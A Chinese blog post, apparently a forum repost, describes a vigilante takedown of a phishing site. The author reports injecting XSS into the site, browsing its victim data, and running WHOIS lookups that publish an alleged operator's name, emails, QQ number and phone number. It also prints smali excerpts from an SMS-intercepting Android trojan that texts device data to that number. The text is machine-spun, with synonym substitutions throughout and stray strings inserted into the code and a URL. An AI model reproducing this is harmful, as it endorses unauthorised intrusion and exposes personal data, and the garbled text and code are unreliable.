<small id='XbiCwMvy'></small> <noframes id='iuIMLG5N'>

  • <tfoot id='NsGRIeLUx'></tfoot>

      <legend id='rYIBgh2Ca'><style id='wDkl9Xt'><dir id='PDpHEWG'><q id='2mNigI1JM'></q></dir></style></legend>
      <i id='Lwu61Kq'><tr id='WcqYETDCt'><dt id='ZR1JE'><q id='avg7wPe8'><span id='eh8EKZyW'><b id='CU0FiIqebr'><form id='BUAnS'><ins id='9jwgPBZk3'></ins><ul id='D4Or7'></ul><sub id='7jOxqdf4'></sub></form><legend id='UZDPvoCLKJ'></legend><bdo id='XgrJCd3U'><pre id='DdiQxZt'><center id='wBMGO'></center></pre></bdo></b><th id='Q4h7DE6Jg'></th></span></q></dt></tr></i><div id='hmiRec'><tfoot id='m1Fa'></tfoot><dl id='duBr'><fieldset id='gJczxE'></fieldset></dl></div>

          <bdo id='fcMahF5r'></bdo><ul id='qaIv7Wu'></ul>

          1. <li id='z234s1qg'></li>
            登陆

            垂钓网站覆灭记

            admin 2019-05-18 173人围观 ,发现0个评论

            事情原因很简略,因为一条短信【伪基站】而引起的。。【方针站点:http://www.XXXXXlb.com】

            0X01 浸透



            鱼站的主页



            鱼站垂钓界面



            丢一段XSS进去玩玩

            过了一会,XSS渠道收到了回来的信息并得到后台地址【http://www.XXXXXlb.com/houtai987】



            网站让下载的那个APP是款短信阻拦木马,一会趁便玩玩



            后台数据蛮多的。。。





            自己对数据进行了简略的收拾



            因为触及个人隐私以及资金安全,就不供给样本和源文件了

            0X02社工

            首要,对域名进行了WHIOS反查,发现其用f-sz@foxmail.com邮箱注册了28个域名





            在排查过程中又发现f-sz@qq.com和fengshizhou@vip.qq.com两个邮箱其间,[email]f-sz@qq.com[/email]注册了7个域名,一起承认其名为冯仕周




            fengshizhou@vip.qq.com注册了合计64个域名



            一起,对名字为冯仕周进行了反查,发现注册了20余个域名





            又发现邮箱地址为179803590@qq.com和chl80sy@163.com的两个地址,因为后续域名及触及QQ和邮箱过多,不再负担

            0X03阻拦马剖析

            所需东西:Android Killer1.31

            环境装备:

            1、所需软件:JAVA_JDK

            Android Killer1.31

            2、装置JAVA_JDK后顺次计算机(我的电脑)→特点,然后看图



            然后新建JAVA_HOME、CLASSPATH、Path三个变量

            相关变量设置如下• JAVA_HOME: C:\Program FiIes\Java\jdkxxxxxx【这个是你JDK装置地址!直接到根目录下即可!】• CLASSPATH: .;%JAVA_HOME%\Iib\dt.jar;%JAVA_HOME%\Iib\tools.jar;

            • Path: ;%JAVA_HOME%\bin;%JAVA_HOM E%\jre\bin;

            3、运转AndroidKiller


            翻开咱们的样本【阻拦马】

            APP权限&信息称号:中国移动兑换客户端包名:com.noticessk.w.q.aerosp进口:com.phone2.stop.activity.MainActivity版别信息:Ver:5.5.365(98) SDK:8 TargetSDK:19权限信息: android.permission.RECEIVE_WAP_PUSH//答应APP承受WAP信息 android.permission.RECEIVE_BOOT_COMPLETED//自启动 android.permission.MODIFY_AUDIO_SETTINGS//音频改动 android.permission.WRITE_EXTERNAL_STORAGE//写入/读取SD卡 android.permission.RECEIVE_USER_PRESENT//读取联系人信息 android.permission.READ_CONTACTS//读取联系人信息 android.permission.INTERNET//网络信息(答应拜访网络) android.permission.READ_PHONE_STATE//读取手机信息(识别码什么的) android.permission.READ_SMS//读取短/彩信 android.permission.WRITE_SETTINGS //修正体系大局设置 android.permission.VIBRATE//操控振动器 android.permission.RECEIVE_SMS//回复短信 android.permission.ACCESS_NETWORK_STATE//检查网络状况 android.permission.GET_TASKS//检索运转中的程序 android.permission.WRITE_SMS//写短信 android.permission.SEND_SMS//发送短信 android.permission.ACCESS_WIFI_STATE//检查WIFI状况


            因为该APP获取了过多的权限【乃至包含设备管理器权限】,所以咱们有必要进行下一步剖析

            那么这个APP获取这么多权限干什么呢?咱们持续来剖析!看下面的代码(方位smail\com\phone\stop\db\a.smail)

            return-void

            .end method

            .method public d()Ljava/lang/String;

            .locals 3

            iget-object v0, p0, Lcom/phone/stop/db/a;->b:Landroid/content/SharedPreferences;

            const-string v1, "a100"

            const-string v2, "15605364232"//手机号呈现!

            invoke-interface {v0, v1, v2}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;

            move-result-object v0

            return-object v0

            获取设备管理器权限进行自我维护【避免用户(被害者)卸载】

            move-result v0

            if-nez v0, :cond_0

            new-instance v0, Landroid/content/Intent;

            const-string v2, "android.app.action.ADD_DEVICE_ADMIN"

            invoke-direct {v0, v2}, Landroid/content/Intent;->(Ljava/lang/String;)V

            const-string v2, "android.app.extra.DEVICE大团结小说_ADMIN"

            invoke-virtual {v0, v2, v1}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Landroid/os/Parcelable;)Landroid/content/Intent;

            const-string v1, "android.app.extra.ADD_EXPLANATION"

            const-string v2, "\\u63d0\\u9ad8\\u6743\\u9650\\u83b7\\u53d6\\u4fdd\\u62a4" //提权取得维护

            invoke-virtual {v0, v1, v2}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;

            const/4 v1, 0x0

            因为呈现了手机号,咱们能够确认APP将一些隐私发送到了这个号码上,成果咱们的下面剖析也证明了这个主意

            发送激活成功与否短信到15605364232

            invoke-static {p0}, Lcom/phone/stop/db/a;->a(Landroid/content/Context;)Lcom/phone/stop/db/a;

            move-result-object v0

            const/4 v1, 0x1

            invoke-virtual {v0, v1}, Lcom/phone/stop/db/a;->a(Z)V

            const-string v0, "\\u6fc0\\u6d3b\\u6210\\u529f" //激活成功

            invoke-static {v0, p0}, Lcom/phone/stop/e/f;->a(Ljava/lang/String;Landroid/content/Context;)V

            :cond_0

            :goto_0

            const/4 v1, 0x0

            const-wide/16 v2, 0x3e8

            invoke-vir垂钓网站覆灭记tual {v0, v1, v2, v3}, Landroid/os/Handler;->sendEmptyMessageDelayed(IJ)Z

            return-void

            :cond_1

            const-string v0, "\\u6fc0\\u6d3b\\u5931\\u8d25" //激活失利

            invoke-static {v0, p0}, Lcom/phone/stop/e/f;->a(Ljava/lang/String;Landroid/content/Context;)V

            goto :goto_0

            .end method

            发送装置成功与否和识别码以及体系版别和手机类型等信息到15605364232

            move-result-object v0

            new-instance v1, Ljava/lang/StringBuilder;

            const-string v2, "\\u8f6f\\u4ef6\\u5b89\\u88c5\\u5b8c\\u6bd5\n\\u8bc6\\u522b\\u7801:" //软件装置结束!识别码:

            invoke-direct {v1, v2}, Ljava/lang/StringBuilder;->(Ljava/lang/String;)V

            invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

            move-result-object v0

            move-result-object v0

            const-string v1, ";\n\\u7cfb\\u7edf\\u7248\\u672c:" //体系版别:

            invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;//获取体系版别

            move-result-object v0

            invoke-direct {v0}, Ljava/lang/StringBuilder;->()V

            const-string v1, "\\u578b\\u53f7:"//类型

            invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

            move-result-object v0

            sget-object v1, Landroid/os/Build;->MODEL:Ljava/lang/String;

            invoke-static {v1}, Lcom/phone/stop/e/e;->a(Ljava/lang/String;)Ljava/lang/String;

            move-result-object v1

            move-result-object v0

            const-string v1, ";\n\\u624b\\u673a:"//获取手机厂商名字

            invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/l垂钓网站覆灭记ang/String;)Ljava/lang/StringBuilder;

            move-result-object v0

            0X04总结

            至此,垂钓网站的人基本信息现已拿到

            名字:冯X周

            手机:1XXX5364232

            QQ:179XXX590

            常用邮箱:f-sz@qq.com、fengshizhou@vip.qq.com、f-sz@foxmail.com、179803590@qq.com、chl80sy@163.com

            本文作者:Sp4ce,转载自:https://bbs.ichunqiu.com/for垂钓网站覆灭记um.php?mod=viewthread&tid=10283&ctid=127

            请关注微信公众号
            微信二维码
            不容错过
            Powered By Z-BlogPHP